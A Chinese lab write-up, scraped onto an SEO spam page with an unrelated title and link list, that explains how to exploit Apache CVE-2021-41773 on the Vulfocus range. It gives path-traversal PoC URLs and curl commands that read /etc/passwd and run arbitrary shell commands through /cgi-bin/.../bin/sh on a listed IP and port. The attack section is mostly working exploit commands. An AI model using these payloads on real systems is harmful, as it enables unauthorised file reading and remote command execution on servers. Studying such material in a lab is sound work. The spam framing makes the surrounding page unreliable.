当前位置: 首页 > news >正文

wordpress 安装 权限设置网站seo优化公司

wordpress 安装 权限设置,网站seo优化公司,我做网站推广,做百度推广去些网站加客户本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞(cve_2021_41773)。 靶场链接:Vulfocus 漏洞威胁分析平台 一,漏洞简介。 cve_2021_41773漏洞…

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

本文主要讲解apache命令执行漏洞(cve_2021_41773)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,漏洞简介。

cve_2021_41773漏洞是一个目录穿越的高危漏洞,主要影响版本有:Apache(阿帕奇) 2.4.49 和 Apache 2.4.50;其对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

二,poc。

具体poc已给出:

get传参方式poc为:

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到是一段经过了url编码的内容,解密后为:

2,post传参:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

经过两次url解码后,结果为:

三,漏洞利用。

打开靶场连接后,可以发现是一个阿帕奇服务的默认界面。

通过抓包后发现,传参方式为get:

此处使用get传参的poc。

进行攻击测试(poc填写到红框内):

可以看到,回显为修改请求头所读的敏感信息。

此处为什么要用burp,因为浏览器自动对路径进行了一次url解码,用burp发送过去的请求,不会被自动解码

‍四,rce。

1,查看敏感文件。

在kali上使用curl 命令进⾏进一步渗透工作。

读取敏感文件的命令为:

 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

① [ip] 替换成被攻击服务器的 IP。

② port 替换为被攻击服务器端⼝。

curl简介:Linux命令行工具:curl详解(与服务器之间传输数据)_curl socks5代理-CSDN博客

2,通用操作。 

具体格式为:

 curl --data "echo;shell" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

替换shell为想要执行的命令。

取得敏感信息,查询一下当前用户:

 curl --data "echo;whoami" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

查看一下当前目录:

 curl --data "echo;pwd"  http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh       

获取flag:

curl --data  "echo;ls /tmp"   http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

http://www.jinmujx.cn/news/119114.html

相关文章:

  • 重庆网站推广产品企业360搜索引擎下载
  • 大连网站推广怎么收费搜狗竞价推广效果怎么样
  • 律师推广网站排名合肥最新消息今天
  • 网站建设公众号管理seo网站诊断分析报告
  • 天猫淘宝优惠券网站怎么做seo推广沧州公司电话
  • 做网站需要公司资料吗链接是什么意思
  • 网站开发 高级认证网站关键词排名批量查询
  • 广州企业建站平台推广是什么
  • 新手如何做海外网站代购市场调研的基本流程
  • 企业网站推广计划快速排名优化
  • 抓取网站访客数据原理网络精准推广
  • 网站做系统叫什么名字推广平台有哪些?
  • 西安营销型网站建设动力无限微信广告推广如何收费
  • 软件系统开发的大概步骤佛山百度seo代理
  • 企业所得税怎么算一般纳税人seo中国是什么
  • 做网站无锡海南百度推广运营中心
  • 淮安做网站就找卓越凯欣网络营销方案
  • 老虎淘客系统可以做网站吗网络营销公司怎么注册
  • 天元建设集团有限公司联系电话seo搜索引擎优化总结
  • 苏州做网站便宜的公司哪家好win10优化大师有用吗
  • php 建设网站制作网站seo优化徐州百度网络
  • 一个阿里云怎么做两个网站吗大数据培训机构排名前十
  • 网站建设需要哪些知识html简单网页代码
  • 做网站送白酒重庆关键词优化平台
  • 建筑公司网站 新闻网络营销策略有哪几种
  • 菠菜网站怎么做推广网络营销策略制定
  • 易思企业网站破解版网络推广需要什么
  • bl做h视频网站广东seo网站优化公司
  • 衡水做网站技术seo整站优化新站快速排名
  • 做网站用什么版本系统网站域名注册